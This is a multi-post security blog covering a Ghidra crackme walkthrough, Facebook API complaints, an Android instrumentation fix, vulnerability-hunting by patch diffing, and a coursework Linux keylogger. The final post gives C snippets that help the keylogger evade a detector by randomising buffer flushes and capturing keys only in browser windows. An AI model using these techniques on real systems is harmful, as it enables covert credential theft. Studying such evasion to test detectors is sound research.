Playing with NSA’s Ghidra

A couple of weeks ago, the NSA released a complex binary analysis tool called Ghidra. At the time, I was working on an ARM binary analysis tool as a personal project, so I was excited: I threw a couple of binaries from different platforms at it to see what the tool could do. It was amazing. It performs several analyses and even generates pseudo-C code. IDA Pro has real competition now, I guess: a free tool with almost all the features one could ask for…

The last time I did Windows binary reverse engineering was probably more than 10 years ago, back when I used to do malware analysis. In those days, I had a set of tools such as WinDbg, OllyDbg, PE Explorer, Dependency Walker, SoftICE and IDA, along with Sysinternals tools such as FileMon, Regmon and Process Explorer. Each tool provided different interesting functionality that made the overall malware analysis a lot easier.

As an excuse to see how Ghidra works, I decided to try reversing a simple Windows program. I grabbed the first Windows entry on crackmes.one, a site hosting CrackMe challenges. The goal is to find the password.

I ran the CrackMe program in a VM and noticed it asks for a username and password. When we enter the wrong details, it displays “Wrong password.” as shown below. With this in mind, we open Ghidra and load the EXE (skipping a couple of screenshots of the loading steps…).

[Screenshot]

We could start from the entry point and look for the location where the password check happens. But that would mean doing unnecessary manual static analysis, stepping through different dependencies until we reach the interesting location. Instead, the easiest way is to walk through the import address table (IAT) looking for printing functions the program references. The idea is to find the location where “Wrong password.” is printed, as that is the most probable place where the password comparison is done. (If the function were loaded dynamically, it wouldn’t appear in the IAT and we would need a different approach.)

[Screenshot]

We see a printing function, printf, in the IAT. We look up its references as shown below.

[Screenshot]

We see that a wrapping function _printf calls the actual printf. We repeat the same process and find references to _printf.

[Screenshot]

To do so, we click on _printf in the Location Reference Provider window, then close the window, right-click on the function identifier _printf and select References > Show references to _printf from the context menu.

[Screenshot]

Selecting any one of the references shows the following result: the disassembly in the left pane and the pseudo-C in the right pane. If we know some details about the function, such as its signature, we can change the function signature so that the tool decompiles the program better.

[Screenshot]

For this function, we don’t need to add much. Basically, it looks like it allocates a buffer for user input and calls _promt_user(buffer). _promt_user() appears to do the following: show the ‘Enter your username’ message and store a maximum of 19 bytes in the buffer as the username; then prompt ‘Now enter your password’ and store the input, up to a maximum of 29 bytes, in the buffer at offset 0x1e (30), which will be the password. It then looks for ‘\n’ (decimal 10, hex 0x0A) in the password section of the buffer (offset 0x1e); if found, it terminates the string there by replacing it with ‘\0’. Now the buffer looks like the following.

[Screenshot]
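To make the reconstruction concrete, here is a minimal C sketch of what _promt_user() seems to do. The names are mine, and the exact input routine and sizes are assumptions read off the pseudo-C, not confirmed from the binary.

#include <stdio.h>
#include <string.h>

/* Hypothetical reconstruction of _promt_user(); buffer is 50 bytes. */
void promt_user(char *buffer)
{
    printf("Enter your username\n");
    fgets(buffer, 20, stdin);          /* up to 19 chars + '\0' */

    printf("Now enter your password\n");
    fgets(buffer + 0x1e, 30, stdin);   /* up to 29 chars, at offset 30 */

    /* Terminate the password at the first '\n' (0x0A), if any. */
    char *nl = strchr(buffer + 0x1e, '\n');
    if (nl != NULL)
        *nl = '\0';
}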

Some calculations do not add up. The buffer is 50 bytes long, but the password is written at offset 30, which means the password can only be 19 bytes (plus 1 byte for the terminating null character). Yet the program reads up to 29 bytes from stdin as the password (30 + 29 = 59 bytes in total, while the buffer is only 50 bytes). This means the user can write 9 characters beyond the end of the buffer. We have a buffer overflow here, but with only 9 bytes for shellcode: not enough for a jump to the interesting location at 0x004014aa. A DoS is still possible, though, since writing more than 4 bytes past the buffer modifies the return address. Let’s forget about the buffer overflow and move on.

[Screenshot]

We just saw that _promt_user() simply asks the user for a username and password and returns the user input. The next step is to check the password using _check_password(buffer).

[Screenshot]

Here, the ‘stored’ password is retrieved using _get_pwd(_buff), and buffer[30] is compared with some_pointer + _buff[0] (variable local_30 renamed to _buff). Let’s see what _get_pwd(_buff) does.

To summarize, this function allocates a buffer[1000] on the heap, populates its integer-array parameter (_buff) with random values, then assigns the following constants to the variable _Memory.

_Memory[0] = 0x76;  // 118
_Memory[1] = 0x2f;  // 47
_Memory[2] = 0x6d;  // 109
_Memory[3] = 0x30;  // 48
_Memory[4] = 0x73;  // 115
_Memory[5] = 0x33;  // 51
_Memory[6] = 0xff;  // 255

Then it iterates 6 times, setting values in the allocated memory as follows.

  • First, take _Memory[0] + 1 = 119 and set buffer[_buff[0]] = 119, where _buff is the parameter to _get_pwd().
  • Second, take _Memory[1] + 1 = 48 and set buffer[_buff[1]] = 48, and so on.
  • At the end, it returns a pointer to the heap buffer, as sketched below.

[Screenshot]
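Putting it together, here is a minimal C sketch of _get_pwd(). The names are mine, and how the random indices are generated is an assumption (I only know the parameter gets filled with random values).

#include <stdlib.h>

/* Hypothetical reconstruction of _get_pwd(). */
char *get_pwd(int *buff)
{
    static const unsigned char memory[7] =
        { 0x76, 0x2f, 0x6d, 0x30, 0x73, 0x33, 0xff };
    char *heap_buf = malloc(1000);         /* buffer[1000] on the heap */

    for (int i = 0; i < 6; i++) {
        buff[i] = rand() % 1000;           /* random index (assumed) */
        heap_buf[buff[i]] = memory[i] + 1; /* e.g. 0x76 + 1 = 119 = 'w' */
    }
    return heap_buf;
}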

Now we are back at _check_password(). Earlier, we said the ‘stored’ password is retrieved using _get_pwd(_buff) and buffer[30] is compared with some_pointer + _buff[0] (local_30 renamed to _buff). Now let’s refine that.

  • The ‘stored’ password is retrieved using _get_pwd(_buff), and buffer[30] is compared with buffer + _buff[0] (which is equivalent to buffer[_buff[0]]).
  • Recall from _get_pwd()’s first iteration that buffer[_buff[0]] = 119.
  • Therefore, the final check is buffer[30] == 119, i.e., buffer[30] == ‘w’.
  • In other words, the first character of the password phrase (buffer[30]) must be ‘w’, as the sketch below illustrates.
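As a sketch (again with my own names), the decisive part of _check_password() boils down to this:

/* Hypothetical reconstruction of the decisive check in _check_password();
 * only the first character of the password is actually compared. */
int check_password(char *buffer)
{
    int _buff[6];
    char *pwd = get_pwd(_buff);          /* pwd[_buff[0]] == 'w' */
    return buffer[30] == pwd[_buff[0]];  /* i.e., buffer[30] == 'w' */
}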

With that, we conclude that the password is anything that starts with ‘w’, e.g., ‘world’, and the username doesn’t matter.

The pseudo-C code provided by Ghidra is very helpful for understanding the binary, though sometimes renaming and retyping may be required. This was an exercise to see whether I still remember the basics of reversing a Windows binary, with the added challenge of using a new reversing tool. It was fun.

One thing I would like to mention regarding Ghidra is that I had a problem with scrolling. I was not using an external mouse during this analysis; I was using the touchpad on a Mac. Scrolling in the disassembly pane was problematic: it jumped several addresses up or down, making me lose my place, and I had to redo the different steps to get back to the location I was investigating. I don’t know if this is a problem specific to my setup, but I will give it a try with an external mouse and an additional monitor.

What I am actually interested in is the headless version, where analysis output is produced via the command line, so that I can build some other automated binary analysis tool on top of it. Let’s see how it goes.

Ciao!

Why are Facebook engineers confused about App Review?

So Facebook recently changed its API policy. Yes, Cambridge Analytica ruined it for everybody. Facebook has limited API access and now also requires app review for most of the permissions an app can request. There were still some loopholes, but recently they closed almost everything, saying your app has to pass through review.


So they basically want to see how you use their API. But this assumes you are dealing with user data. For example, you have a Facebook Login plugin for OAuth on your website, and when a user uses the plugin to log in to your website, you request permissions from the user (e.g., permission to post on the user’s behalf). The permissions could be for the user’s profile or the privilege to manage the user’s pages.

The problem comes here: what if you want to access your own data? Do you have to pass through the review? As long as you’re only accessing your own data, it should NOT be a problem. So, basically, I create my access_token via the Graph Explorer and use the API to access my data.
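As a minimal sketch of that workflow, here is roughly what accessing my own profile looks like in C with libcurl; the token value is a placeholder and the requested fields are just an example.

#include <curl/curl.h>

/* Fetch my own profile with an access_token generated in the
 * Graph Explorer. TOKEN is a placeholder for the real token. */
int main(void)
{
    CURL *curl = curl_easy_init();
    if (curl) {
        curl_easy_setopt(curl, CURLOPT_URL,
            "https://graph.facebook.com/me?fields=id,name&access_token=TOKEN");
        curl_easy_perform(curl);   /* response body goes to stdout */
        curl_easy_cleanup(curl);
    }
    return 0;
}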

When Facebook required app review, I submitted the app along with a screencast (as they requested). I got a response saying they couldn’t see the login plugin in the video. But I don’t use the login plugin, because I am not asking people to log in using Facebook. Basically, I don’t use the app to interact with Facebook users.

I explained in detail what I wanted to do and the fact that my app is not related to users. Their response was “we can’t find the login plugin on your website.”

During all this time, the API was working on and off without review, for reasons I do not know. And the people I was in contact with were developers, not just tech support (at least, that’s what Facebook said). Why they were not able to understand the use case is beyond me. This is the point where I said to hell with their API. I will find a way, though it will be painful, because the Facebook API has become useless.

The fix should be very easy for Facebook, though. If an app is not reviewed, just limit its access to the app developer’s own data/page/group… just like when the app is in development mode, except for being able to publish on your own profile/page/group.

How the latest Facebook hack could have cost money to its users

Facebook has recently reported that external actors exploited a bug in its system to gain access to more than 50 million user accounts. Apparently, three different bugs were used together to get the access tokens of the affected users, which let the attackers log in to Facebook without needing the users’ passwords. Though Facebook is still investigating what data the attackers could have gotten, considering that the access token is powerful (it has the permissions of the Facebook mobile app), we can assume they got everything. However, apart from getting user data, the attackers could also have performed several (automated or manual) actions using the affected users’ accounts, including ones that cost money! The following are off the top of my head, assuming 50 million user accounts:

Bypass Facebook News Feed algorithm

We know the Facebook News Feed algorithm favors posts that have initial momentum (reactions, comments and shares). Thus, the attackers could have used the affected users’ accounts to generate fake reactions, comments and shares in order to fool the algorithm.

Sell Facebook Page Likes

In order to increase a Facebook Page’s Likes, one has to pay Facebook to advertise the Page to an audience that is likely to like it. However, using the 50 million accounts, the attackers could bypass Facebook advertising and sell Likes directly to their own customers. The same applies to the first case, where the attackers sell traction.

Take over users’ Facebook Pages and Facebook Groups

Imagine having a Page with millions of Likes that you spent money on, and because of a bug in Facebook’s system, attackers take control of it and remove you from the admin list. Though Facebook might restore ownership, it is reportedly not that simple to get it back.

Use a configured Facebook ad account

This one would actually cost the user money. If a user has a configured ad account, the attackers could use it to promote something, which costs money. Moreover, the attackers could advertise something that violates Facebook’s policy and get the user’s ad account disabled.


According to the notification I received on Facebook, I am one of the 50 million affected users. Though Facebook is still working on it, I went through the places where I could check whether my account was used to perform some actions. For now, it seems fine. But I can’t say anything about the data they may have taken.


Stay safe on this unsafe platform.

java.lang.VerifyError error after instrumenting/transforming Android apps

You might have encountered the java.lang.VerifyError DEX verification error when developing an Android app. There are several reasons for it, the most common being the IDE messing up the build process; cleaning and rebuilding might solve the problem. In some cases it could also be caused by tools that we use (for example, security tools for obfuscation). There are several resources for this case on the net, and it is relatively easy to fix.

However, what I want to write about in this post is not the developer’s point of view, but rather the automated software testing point of view (involving instrumentation or code transformation), where you have hundreds or even thousands of Android apps to test and you don’t have their source code. Here is my experience.

For a security testing experiment on Android apps, I had to mutate apps that satisfy certain mutation criteria. After a mutation was applied, I had to automatically verify that it didn’t break the app. To achieve this, I applied the mutation (and all the steps necessary to make the app ready to install), installed the app on the emulator and tested whether the mutated component crashes. In order to understand whether a crash is caused by the applied mutation, I wrap the introduced statements in a try-catch block and log the exception.

However, running the mutated apps on the emulator failed with java.lang.VerifyError. The strict runtime refused to load the “inconsistent” bytecode into the VM because it found a “Bad method” or some other issue. This may depend on the level of instrumentation you are applying; if you’re only introducing, say, a log statement, maybe you will not encounter this problem and the instrumented app will run fine.

Since the mutation is applied automatically to many different real-world apps, addressing the problem app by app is difficult. For example, it is known that the runtime will report an error if we wrap a synchronized block in a try-catch block. Therefore, while doing the mutation, it is a bit difficult (but not impossible) to know in advance whether a call I wrapped in a try-catch block will eventually contain a synchronized block. Even if I knew this in advance (say, during the static analysis that checks the mutation criteria), it wouldn’t help: I cannot skip the try-catch block, since I need it to see whether a failure is caused by the mutation, and I cannot remove the synchronized block either, since that would interfere with the design of the app.

Cause

This is just one case; the Android Runtime checks for several inconsistencies that were ignored in the Dalvik VM days. To mention some of the inconsistencies caught by the new runtime:

  • extending a class that was declared final
  • overriding a package-private method
  • invalid control flow
  • unbalanced monitorenter/monitorexit (this might be the reason for the synchronized-block case, but I haven’t checked the final bytecode for the said inconsistency)
  • passing a wrong argument to a method

Solution

A more general solution would be to understand which modifications make the verification fail and improve the instrumentation accordingly. However, that is out of scope for the moment.

So the solution I found is specific to my problem. Considering that ART was introduced in Android 5 (API 21), the easiest workaround I found was using an emulator running, say, API 20. Since I know what kinds of mutations I am applying, and I also monitor executions, resorting to a less restrictive runtime wouldn’t affect the general behavior of the app under test.

Therefore, if your instrumented Android app isn’t running on the emulator because of the ART java.lang.VerifyError error, just use emulators running API levels below 21; it should be an easy workaround.

Cheers!

Chrome Extension “Video Downloader GetThemAll 30.0.2” might contain malware


So I have been using this extension for a while, and all of a sudden it was disabled. Going to the extension to see what happened, Chrome reports that the extension contains malware and has been disabled for that reason.

What could have happened?

As has happened to other popular extensions, it could have been modified to include malicious behavior, had its ownership transferred to potentially malicious owners, been hacked, or shipped an update with a policy-violating feature (e.g., downloading from YouTube); we don’t know. There is also a rumor that the extension was mining cryptocurrency. It is time to analyze version 30.0.2 in detail in order to understand what information could have leaked, if any.

Though GetThemAll 30.0.3 is already available on the Chrome Web Store, it is probably better to stay away until there are further results on what happened in the previous version.

A quick look at the diff between versions 30.0.2 and 30.0.3 shows that the former has a suspicious obfuscated “background.js” file that accesses the images/video_help.png file, which also exists only in version 30.0.2.

Cheers

Sources of dangerous vulnerabilities

There are a lot of whitehat and blackhat security researchers out there. While whitehat researchers inform the target company before disclosing vulnerabilities, blackhats either use the vulnerabilities for their own activities or sell them on the black market. But both kinds of researchers spend a lot of time stepping through code around places where potential vulnerabilities might exist (e.g., around input-manipulation code, hunting for buffer overflow or format string vulnerabilities).

But there are a couple of other tricks to facilitate the hunt. One of them is comparing binaries of critical updates pushed by the vendor. Taking Windows as an example: if Microsoft pushes a critical update, say, for one of the services handled by svchost.exe, an attacker may compare the old binary with the new, updated version to see where Microsoft patched the vulnerabilities. In some cases, reverse engineering the patch might also reveal the vulnerabilities. The vulnerabilities found will interest the attacker if they allow remote code execution, local privilege escalation or any arbitrary code execution. Since not all people update their systems as soon as an update is pushed, the attackers have enough time to craft their exploit and start using it. If I remember correctly, the Sasser worm (2004) exploited the vulnerability patched in MS04-011, which was discovered this way.

The other potential source of information is Windows’ Dr. Watson. When applications crash, the error-reporting feature in Windows XP and later versions might leak some important information about the source of the error. Reverse engineering around that location might reveal a vulnerability in the target application. The error reports could be gathered on a lab computer or from different compromised computers.

These are definitely not the only ways to identify vulnerabilities from binaries.

X11 based Linux keylogger

As a challenge to the paper “Unprivileged Black-Box Detection of User-Space Keyloggers”, we were asked to write a Linux keylogger that can hide from the tool described in the paper. A friend and I came up with several ideas to keep our keylogger from being detected. We didn’t manage to include all the ideas in the keylogger code because of time constraints, but the professor confirmed that if we had included those options, their tool wouldn’t have detected it. Before describing the ideas we came up with, let me explain in a nutshell how their detection method works.

They assumed that, by design, keyloggers capture keystrokes and save them to a file. If, for example, “AbCdeF” was typed on the keyboard, somewhere some process is writing a file with the same bytes. So they check for this correlation by sending keys to all running processes, monitoring file activities and checking the number of bytes written. If the same number of bytes is written to a file, then the process that wrote that file is flagged as a keylogger.

Our ideas to circumvent this are presented below. Obviously, these are for educational purposes only.

1. Buffering. We use a buffer that changes its flush size every time it writes its content to file. Here is how it works.

Let’s say we have buf[1024], and let the first random flush threshold be 750. We keep buffering until 750 bytes are reached, then write them to file. The next threshold is then chosen randomly, say 900, and the process continues like that, as the sketch below shows.
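A minimal C sketch of this idea (the buffer size and threshold range are just examples):

#include <stdio.h>
#include <stdlib.h>

/* Idea 1: flush the log at a randomly changing threshold so the byte
 * counts written to file never match the keystrokes the detector injects. */
#define BUF_MAX 1024

static char   buf[BUF_MAX];
static size_t used;
static size_t threshold = 750;           /* first random size */

void log_key(char c, FILE *out)
{
    buf[used++] = c;
    if (used >= threshold) {
        fwrite(buf, 1, used, out);
        fflush(out);
        used = 0;
        threshold = 512 + rand() % 512;  /* next random size: 512..1023 */
    }
}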

2. If we’re on an Internet-connected computer, we directly post the logged keystrokes to a remote server. That’s it: nothing on file.

3. Being selective about when we capture keys. Let’s face it: when we capture keys, usually it’s a password or something related. Why would we be interested in keys typed into Sublime? So we targeted web browsers: Mozilla Firefox and Google Chrome. What does that mean? Their tool sends our keylogger a key and it is ignored. It keeps logging like a boss 🙂 A sketch of the focused-window check follows.
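Here is a C sketch of that check. The WM_CLASS matching is simplified; a real implementation may have to walk up to the top-level window to find the class hint.

#include <X11/Xlib.h>
#include <X11/Xutil.h>
#include <string.h>

/* Idea 3: only log keys when the focused window looks like a browser. */
int focused_window_is_browser(Display *dpy)
{
    Window win;
    int revert_to;
    XClassHint hint = { NULL, NULL };
    int is_browser = 0;

    XGetInputFocus(dpy, &win, &revert_to);
    if (win != None && win != PointerRoot &&
        XGetClassHint(dpy, win, &hint)) {
        if (hint.res_class &&
            (strstr(hint.res_class, "irefox") ||   /* Firefox */
             strstr(hint.res_class, "hrome")))     /* Chrome/Chromium */
            is_browser = 1;
        if (hint.res_name)  XFree(hint.res_name);
        if (hint.res_class) XFree(hint.res_class);
    }
    return is_browser;
}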

There were also other ideas, such as producing output on file of a different size than the entered keys by applying cryptography, but the paper says they addressed this issue very well, so we didn’t bother to test it. I will post code if anybody is interested.

The C source code of the X11-based Linux keylogger can be found here.

This work got us full points.